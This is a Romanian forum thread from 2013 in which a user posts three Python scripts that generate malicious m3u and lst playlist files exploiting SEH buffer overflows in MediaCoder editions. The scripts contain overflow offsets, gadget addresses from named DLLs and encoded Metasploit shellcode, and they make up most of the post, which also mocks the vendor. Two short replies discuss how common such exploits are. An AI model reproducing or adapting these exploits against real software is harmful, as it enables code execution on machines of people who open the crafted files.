neox Posted June 21, 2013 Report Posted June 21, 2013 (edited) Salut la toti baieti Azi nu am avut ce face si am dat de pagina asta MediaCoder - more than a universal audio/video transcoder - MediaCoder official website toate bune si frumoase dar nu am vazut programator asa prost ca asta Are urmatoarele producte:MediaCoder - Choose your MediaCoder editionToate productele sunt vulnerabile mi-ar fi rusine pretul la producte :MediaCoder Premium - The fast and low-cost solution for cooperative transcoding applicationsAll Mediacoder Product SEH Buffer Overflow format m3u#!/usr/bin/pythonimport osimport sysfrom struct import packfrom time import sleepif os.name == "nt": os.system("cls") os.system("color 3f")else: os.system("clear")print """ [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow [+]Download All Product: http://www.mediacoderhq.com/editions.html [+]Vulnerable Product:! [+]Mediacoder 0.8.22.5525 [+]Mediacoder Web Video Edition 0.8.22 [+]Mediacoder Handsets Edition 0.8.22 [+]Mediacoder iPhone Edition 0.8.22 [+]MediaCoder-PSP Edition 0.8.22 [+]Vulnerabilities File Format:m3u [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """buffer = "http://" + "\x41" * 845nseh = "\xEB\x06\xFF\xFF"seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dllnops= "\x90" * 80#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t cshell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1""\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e""\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10""\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7""\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5""\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97""\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f""\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd""\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2""\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04""\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3""\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d""\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e""\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4""\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f""\xaa\x4d")exploit = buffer + nseh + seh + nops + shelltry: rst= open("All-MediaCoder.m3u",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n")except: print "Error"All Mediacoder Product SEH Buffer Overflow format lst#!/usr/bin/pythonimport osimport sysfrom struct import packfrom time import sleepif os.name == "nt": os.system("cls") os.system("color 3f")else: os.system("clear")print """ [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow [+]Download All Product: [url=http://www.mediacoderhq.com/editions.html]MediaCoder - Choose your MediaCoder edition[/url] [+]Vulnerable Product:! [+]Mediacoder 0.8.22.5525 [+]Mediacoder Web Video Edition 0.8.22 [+]Mediacoder Handsets Edition 0.8.22 [+]Mediacoder iPhone Edition 0.8.22 [+]MediaCoder-PSP Edition 0.8.22 [+]Vulnerabilities File Format:lst [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """buffer = "http://" + "\x41" * 845nseh = "\xEB\x06\xFF\xFF"seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dllnops= "\x90" * 80#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t cshell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1""\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e""\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10""\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7""\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5""\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97""\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f""\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd""\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2""\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04""\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3""\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d""\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e""\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4""\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f""\xaa\x4d")exploit = buffer + nseh + seh + nops + shelltry: rst= open("All-MediaCoder.lst",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n")except: print "Error"MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit (SEH)#!/usr/bin/pythonprint """ [+]Exploit Title: MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit (SEH) [+]Download link: http://www.mediacoderhq.com/device/mpx.htm [+]Vulnerable Product: MediaCoder (Personal Media Player) Edition [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """from struct import packjunk = "http://" + "\x41" * 765nseh = "\xeb\x06\x90\x90" seh = pack('<I',0x66D81575)#66D81575 5F POP EDI avutil-52.dllnops= "\x90" * 80#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t cshell=("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1""\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e""\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10""\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7""\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5""\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97""\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f""\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd""\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2""\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04""\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3""\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d""\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e""\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4""\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f""\xaa\x4d")exploit = junk + nseh + seh + nops + shelltry: rst= open("mediacoder-pmp.m3u",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n")except: print "Error"Audiocoder l-am facut inainte l-am gasit pe sofpedia nu am stiut ca apartine de Mediacoder Product https://rstforums.com/forum/68712-audiocoder-buffer-overflow-exploit-seh.rst Edited June 21, 2013 by neox 1 Quote
me.mello Posted June 22, 2013 Report Posted June 22, 2013 Exploituri lst si m3u au fost de ani de zile postate pe exploit-db ex: http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=m3u&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=, puteau si ei sa ia aminte, oricat de greu pare acest tip de vulnerabilitate odata invatat sunt foarte usor de exploatat si totodata puteau la fel de usor verificat nu doar in codul sursa....Nush cum ti-a venit sa te iei fix de produsul astora facut in garaj, eu unul nici nu am auzit de ei:)) Quote
neox Posted June 22, 2013 Author Report Posted June 22, 2013 (edited) Exploituri lst si m3u au fost de ani de zile postate pe exploit-db ex: http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=m3u&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=, puteau si ei sa ia aminte, oricat de greu pare acest tip de vulnerabilitate odata invatat sunt foarte usor de exploatat si totodata puteau la fel de usor verificat nu doar in codul sursa....Nush cum ti-a venit sa te iei fix de produsul astora facut in garaj, eu unul nici nu am auzit de ei:)) da si eu cred ca in garaj au facut productele Edited June 22, 2013 by neox Quote
